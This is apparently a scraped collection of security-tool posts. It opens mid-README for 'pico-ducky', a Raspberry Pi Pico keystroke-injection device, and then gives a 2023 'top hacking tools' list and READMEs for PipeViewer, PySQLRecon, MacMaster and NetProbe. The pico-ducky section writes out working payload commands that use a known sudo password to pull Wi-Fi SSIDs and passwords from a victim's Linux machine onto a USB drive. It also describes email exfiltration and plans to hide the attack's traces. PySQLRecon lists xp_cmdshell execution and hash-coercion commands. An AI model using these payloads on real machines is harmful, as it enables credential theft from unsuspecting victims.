    • After sending data over the email, the .txt file is deleted.

    • You can also use an SMTP server from another email provider, but you should be mindful of the SMTP server and port number you write in the payload.

    • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

    Linux exploit

    In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

    Storing stolen data to USB flash drive

    Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

    STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

    STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

    In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

    STRING echo PASSWORD | sudo -S echo

    STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

    Bash script

    In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick, after which you can type the following command in your terminal:

    echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

    where PASSWORD is your account's password and USBSTICK is the name for your USB device.

    Quick overview of the payload

    NetworkManager is based on the concept of connection profiles and uses plugins for reading/writing data. It uses an .ini-style keyfile format to store network configuration profiles; the keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with a regex in order to extract the data of interest. For file filtering, a positive lookbehind assertion ((?<=keyword)) was used. The positive lookbehind assertion matches at the position right after the keyword without making the keyword itself part of the match, so the regex (?<=keyword).* matches any text that follows the keyword. This allows the payload to match the values after the ssid and psk (pre-shared key) keywords.
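
    The same lookbehind can be demonstrated in a few lines of Python against a made-up keyfile excerpt (illustrative values only):

    import re

    # Minimal, made-up excerpt in the NetworkManager keyfile format described above.
    keyfile = """[wifi]
    ssid=WLAN1

    [wifi-security]
    psk=pass1
    """

    # The lookbehind matches at the position right after the keyword
    # without including the keyword itself in the match.
    ssid = re.search(r"(?<=ssid=).*", keyfile).group()
    psk = re.search(r"(?<=psk=).*", keyfile).group()
    print(ssid, psk)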

    For more information about NetworkManager, here are some useful links:

    Exfiltrated data formatting

    Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

    Wireless_Network_Name Password
    --------------------- --------
    WLAN1 pass1
    WLAN2 pass2
    WLAN3 pass3

    USB Mass Storage Device Problem

    One of the advantages of the Rubber Ducky over the RPi Pico is that it doesn't show up as a USB mass storage device once plugged in; the machine sees it only as a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

    Tip:

    • Upload your payload to RPi Pico before you connect the pins.
    • Don't solder the pins because you will probably want to change/update the payload at some point.

    Payload Writer

    When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below you can find an example of how to run the writer script when creating a Windows payload.

    python3 writer.py windows payload1.dd

    Limitations/Drawbacks

    • This pico-ducky currently works only on Windows OS.

    • This attack requires physical access to an unlocked device in order to be successfully deployed.

    • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admin's password for the Linux machine.

    • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

    • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

    • The pico-ducky device isn't really stealthy; quite the opposite, it's rather bulky, especially if you solder the pins.

    • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

    • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

    • If the computer has a non-English Environment set, this exploit won't be successful.

    • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

    To-Do List

    • Fix Caps Lock bug.
    • Fix non-English Environment bug.
    • Obfuscate the command prompt.
    • Implement exfiltration over a physical medium.
    • Create a payload for Linux.
    • Encode/Encrypt exfiltrated data before sending it over email.
    • Implement indicator of successfully completed exploit.
    • Implement command history clean-up for Linux exploit.
    • Enhance the Linux exploit in order to avoid usage of sudo.


    Top 20 Most Popular Hacking Tools in 2023

    By: Zion3R

    As in previous years, we have put together a ranking of the most popular tools published between January and December 2023.

    The tools of this year encompass a diverse range of cybersecurity disciplines, including AI-Enhanced Penetration Testing, Advanced Vulnerability Management, Stealth Communication Techniques, Open-Source General Purpose Vulnerability Scanning, and more.

    Without going into further details, we have prepared a useful list of the most popular tools in Kitploit 2023:


    1. PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session


    2. Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


    3. Faraday - Open Source Vulnerability Management Platform


    4. CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare


    5. Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools


    6. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


    7. Waf-Bypass - Check Your WAF Before An Attacker Does


    8. PentestGPT - A GPT-empowered Penetration Testing Tool


    9. Sirius - First Truly Open-Source General Purpose Vulnerability Scanner


    10. LSMS - Linux Security And Monitoring Scripts


    11. GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM


    12. Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403


    13. ThunderCloud - Cloud Exploit Framework


    14. GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


    15. Kscan - Simple Asset Mapping Tool


    16. RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry


    17. DNSWatch - DNS Traffic Sniffer and Analyzer


    18. IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


    19. TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions


    20. XSS-Exploitation-Tool - An XSS Exploitation Tool





    Happy New Year wishes the KitPloit team!


    PipeViewer - A Tool That Shows Detailed Information About Named Pipes In Windows

    By: Zion3R


    A GUI tool for viewing Windows Named Pipes and searching for insecure permissions.

    The tool was published as part of a research about Docker named pipes:
    "Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 1"
    "Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 2"

    Overview

    PipeViewer is a GUI tool that allows users to view details about Windows Named pipes and their permissions. It is designed to be useful for security researchers who are interested in searching for named pipes with weak permissions or testing the security of named pipes. With PipeViewer, users can easily view and analyze information about named pipes on their systems, helping them to identify potential security vulnerabilities and take appropriate steps to secure their systems.
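
    For a quick, scriptable check of which named pipes exist on a host, the pipe namespace can also be listed from Python. This is only a rough illustration of the object being inspected; PipeViewer itself is built on NtApiDotNet and shows far more detail (permissions, owners, and so on):

    # Minimal sketch: enumerate Windows named pipes from Python.
    import os

    # \\.\pipe\ exposes the named-pipe namespace on Windows; the trailing
    # backslashes are needed on some Python versions.
    for name in os.listdir(r"\\.\pipe\\"):
        print(name)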


    Usage

    Double-click the EXE binary and you will get the list of all named pipes.

    Build

    We used Visual Studio to compile it.
    When downloading it from GitHub, you might get an error about blocked files; you can use PowerShell to unblock them:

    Get-ChildItem -Path 'D:\tmp\PipeViewer-main' -Recurse | Unblock-File

    Warning

    We built the project and uploaded it, so you can find it in the releases.
    One problem is that the binary will trigger alerts from Windows Defender because it uses the NtObjectManager package, which is flagged as a virus.
    Note that James Forshaw talked about it here.
    We can't change this because we depend on that third-party DLL.

    Features

    • A detailed overview of named pipes.
    • Filter\highlight rows based on cells.
    • Bold specific rows.
    • Export\Import to\from JSON.
    • PipeChat - create a connection with available named pipes.

    Demo

    PipeViewer3_v1.0.mp4

    Credit

    We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get information about named pipes.

    License

    Copyright (c) 2023 CyberArk Software Ltd. All rights reserved
    This repository is licensed under Apache-2.0 License - see LICENSE for more details.

    References

    For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



    PySQLRecon - Offensive MSSQL Toolkit Written In Python, Based Off SQLRecon

    By: Zion3R


    PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.


    Install

    PySQLRecon can be installed with pip3 install pysqlrecon or by cloning this repository and running pip3 install .

    Commands

    All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV] require elevated privileges or sysadmin rights to run. Alternatively, commands marked with [NORM] can likely be run by normal users and do not require elevated privileges.

    Support for impersonation ([I]) or execution on linked servers ([L]) is denoted at the end of the command description.

    adsi                 [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
    agentcmd             [PRIV] Execute a system command using agent jobs [I,L]
    agentstatus          [PRIV] Enumerate SQL agent status and jobs [I,L]
    checkrpc             [NORM] Enumerate RPC status of linked servers [I,L]
    clr                  [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
    columns              [NORM] Enumerate columns within a table [I,L]
    databases            [NORM] Enumerate databases on a server [I,L]
    disableclr           [PRIV] Disable CLR integration [I,L]
    disableole           [PRIV] Disable OLE automation procedures [I,L]
    disablerpc           [PRIV] Disable RPC and RPC Out on linked server [I]
    disablexp            [PRIV] Disable xp_cmdshell [I,L]
    enableclr            [PRIV] Enable CLR integration [I,L]
    enableole            [PRIV] Enable OLE automation procedures [I,L]
    enablerpc            [PRIV] Enable RPC and RPC Out on linked server [I]
    enablexp             [PRIV] Enable xp_cmdshell [I,L]
    impersonate          [NORM] Enumerate users that can be impersonated
    info                 [NORM] Gather information about the SQL server
    links                [NORM] Enumerate linked servers [I,L]
    olecmd               [PRIV] Execute a system command using OLE automation procedures [I,L]
    query                [NORM] Execute a custom SQL query [I,L]
    rows                 [NORM] Get the count of rows in a table [I,L]
    search               [NORM] Search a table for a column name [I,L]
    smb                  [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
    tables               [NORM] Enumerate tables within a database [I,L]
    users                [NORM] Enumerate users with database access [I,L]
    whoami               [NORM] Gather logged in user, mapped user and roles [I,L]
    xpcmd                [PRIV] Execute a system command using xp_cmdshell [I,L]

    Usage

    PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:

    pysqlrecon [GLOBAL_OPTS] COMMAND [COMMAND_OPTS]

    View global options:

    pysqlrecon --help

    View command specific options:

    pysqlrecon [GLOBAL_OPTS] COMMAND --help

    Change the database authenticated to, or used in certain PySQLRecon commands (query, tables, columns, rows), with the --database flag.

    Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the --link flag.

    Impersonate a user account while running a PySQLRecon command with the --impersonate flag.

    --link and --impersonate are incompatible.

    Development

    pysqlrecon uses Poetry to manage dependencies. Install from source and setup for development with:

    git clone https://github.com/tw1sm/pysqlrecon
    cd pysqlrecon
    poetry install
    poetry run pysqlrecon --help

    Adding a Command

    PySQLRecon is easily extensible - see the template and instructions in resources.

    TODO

    • Add SQLRecon SCCM commands
    • Add Azure SQL DB support?

    References and Credits



    MacMaster - MAC Address Changer

    By: Zion3R


    MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.

    Features

    • Custom MAC Address: Set a specific MAC address to your network interface.
    • Random MAC Address: Generate and set a random MAC address (see the sketch after this list).
    • Reset to Original: Reset the MAC address to its original hardware value.
    • Custom OUI: Set a custom Organizationally Unique Identifier (OUI) for the MAC address.
    • Version Information: Easily check the version of MacMaster you are using.
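
    A minimal Python sketch of how random MAC generation with an optional custom OUI could look. This is illustrative only; the function name and logic are assumptions, not MacMaster's actual code:

    # Illustrative sketch, not MacMaster's implementation: generate a random
    # MAC address, optionally keeping a custom OUI (first three octets).
    import random

    def random_mac(oui=None):
        if oui:
            prefix = [int(octet, 16) for octet in oui.split(":")]
        else:
            # Set the locally administered bit and clear the multicast bit
            # so the generated address is valid for local use.
            first = (random.randint(0x00, 0xFF) | 0x02) & 0xFE
            prefix = [first, random.randint(0x00, 0xFF), random.randint(0x00, 0xFF)]
        tail = [random.randint(0x00, 0xFF) for _ in range(3)]
        return ":".join(f"{octet:02x}" for octet in prefix + tail)

    print(random_mac())            # fully random, locally administered
    print(random_mac("08:00:27"))  # random address under a custom OUI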

    Installation

    MacMaster requires Python 3.6 or later.

    1. Clone the repository:
      $ git clone https://github.com/HalilDeniz/MacMaster.git
    2. Navigate to the cloned directory:
      $ cd MacMaster
    3. Install the package:
      $ python setup.py install

    Usage

    $ macmaster --help
    usage: macmaster [-h] [--interface INTERFACE] [--version]
                     [--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]

    MacMaster: Mac Address Changer

    options:
      -h, --help            show this help message and exit
      --interface INTERFACE, -i INTERFACE
                            Network interface to change MAC address
      --version, -V         Show the version of the program
      --random, -r          Set a random MAC address
      --newmac NEWMAC, -nm NEWMAC
                            Set a specific MAC address
      --customoui CUSTOMOUI, -co CUSTOMOUI
                            Set a custom OUI for the MAC address
      --reset, -rs          Reset MAC address to the original value

    Arguments

    • --interface, -i: Specify the network interface.
    • --random, -r: Set a random MAC address.
    • --newmac, -nm: Set a specific MAC address.
    • --customoui, -co: Set a custom OUI for the MAC address.
    • --reset, -rs: Reset MAC address to the original value.
    • --version, -V: Show the version of the program.
    1. Set a specific MAC address:
      $ macmaster.py -i eth0 -nm 00:11:22:33:44:55
    2. Set a random MAC address:
      $ macmaster.py -i eth0 -r
    3. Reset MAC address to its original value:
      $ macmaster.py -i eth0 -rs
    4. Set a custom OUI:
      $ macmaster.py -i eth0 -co 08:00:27
    5. Show program version:
      $ macmaster.py -V

    Replace eth0 with your desired network interface.

    Note

    You must run this script as root (or with sudo) for it to work properly, because changing a MAC address requires root privileges.
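
    On Linux, applying the new address comes down to privileged ip link calls; the sketch below shows that step. The approach is an assumption for illustration, not necessarily MacMaster's exact code:

    # Sketch of the privileged step on Linux (assumed approach): bring the
    # interface down, set the new address, bring it back up.
    import subprocess

    def set_mac(interface, new_mac):
        subprocess.run(["ip", "link", "set", "dev", interface, "down"], check=True)
        subprocess.run(["ip", "link", "set", "dev", interface, "address", new_mac], check=True)
        subprocess.run(["ip", "link", "set", "dev", interface, "up"], check=True)

    set_mac("eth0", "00:11:22:33:44:55")  # requires root / sudo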

    Contributing

    Contributions are welcome! To contribute to MacMaster, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact

    For any inquiries or further information, you can reach me through the following channels:




    NetProbe - Network Probe

    By: Zion3R


    NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.
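
    Under the hood this is a classic ARP sweep. A minimal Python sketch of the technique, assuming Scapy, is shown below; it is for illustration only and is not necessarily NetProbe's exact implementation:

    # Minimal ARP-scan sketch using Scapy (assumed dependency).
    from scapy.all import ARP, Ether, srp

    def arp_scan(subnet="192.168.1.0/24", iface=None, timeout=2):
        # Broadcast an ARP "who-has" request for every address in the subnet.
        packet = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=subnet)
        answered, _ = srp(packet, timeout=timeout, iface=iface, verbose=False)
        # Each reply carries the responder's IP (psrc) and MAC (hwsrc).
        return [(rcv.psrc, rcv.hwsrc) for _, rcv in answered]

    for ip, mac in arp_scan():
        print(f"{ip:<15} {mac}")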

    Features

    • Scan for devices on a specified IP address or subnet
    • Display the IP address, MAC address, manufacturer, and device model of discovered devices
    • Live tracking of devices (optional)
    • Save scan results to a file (optional)
    • Filter by manufacturer (e.g., 'Apple') (optional)
    • Filter by IP range (e.g., '192.168.1.0/24') (optional)
    • Scan rate in seconds (default: 5) (optional)

    Download

    You can download the program from the GitHub page.

    $ git clone https://github.com/HalilDeniz/NetProbe.git

    Installation

    To install the required libraries, run the following command:

    $ pip install -r requirements.txt

    Usage

    To run the program, use the following command:

    $ python3 netprobe.py [-h] -t  [...] -i  [...] [-l] [-o] [-m] [-r] [-s]
    • -h,--help: show this help message and exit
    • -t,--target: Target IP address or subnet (default: 192.168.1.0/24)
    • -i,--interface: Interface to use (default: None)
    • -l,--live: Enable live tracking of devices
    • -o,--output: Output file to save the results
    • -m,--manufacturer: Filter by manufacturer (e.g., 'Apple')
    • -r,--ip-range: Filter by IP range (e.g., '192.168.1.0/24')
    • -s,--scan-rate: Scan rate in seconds (default: 5)

    Example:

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

    Help Menu

    $ python3 netprobe.py --help                      
    usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]

    NetProbe: Network Scanner Tool

    options:
    -h, --help show this help message and exit
    -t [ ...], --target [ ...]
    Target IP address or subnet (default: 192.168.1.0/24)
    -i [ ...], --interface [ ...]
    Interface to use (default: None)
    -l, --live Enable live tracking of devices
    -o , --output Output file to save the results
    -m , --manufacturer Filter by manufacturer (e.g., 'Apple')
    -r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
    -s , --scan-rate Scan rate in seconds (default: 5)

    Default Scan

    $ python3 netprobe.py 

    Live Tracking

    You can enable live tracking of devices on your network by using the -l or --live flag. This will continuously update the device list every 5 seconds.

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l

    Save Results

    You can save the scan results to a file by using the -o or --output flag followed by the desired output file name.

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
    ┏━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
    ┃ IP Address   ┃ MAC Address       ┃ Packet Size ┃ Manufacturer                 ┃
    ┡━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
    │ 192.168.1.1  │ **:6e:**:97:**:28 │ 102         │ ASUSTek COMPUTER INC.        │
    │ 192.168.1.3  │ 00:**:22:**:12:** │ 102         │ InPro Comm                   │
    │ 192.168.1.2  │ **:32:**:bf:**:00 │ 102         │ Xiaomi Communications Co Ltd │
    │ 192.168.1.98 │ d4:**:64:**:5c:** │ 102         │ ASUSTek COMPUTER INC.        │
    │ 192.168.1.25 │ **:49:**:00:**:38 │ 102         │ Unknown                      │
    └──────────────┴───────────────────┴─────────────┴──────────────────────────────┘
    

    Contact

    If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:

    License

    This program is released under the MIT LICENSE. See LICENSE for more information.


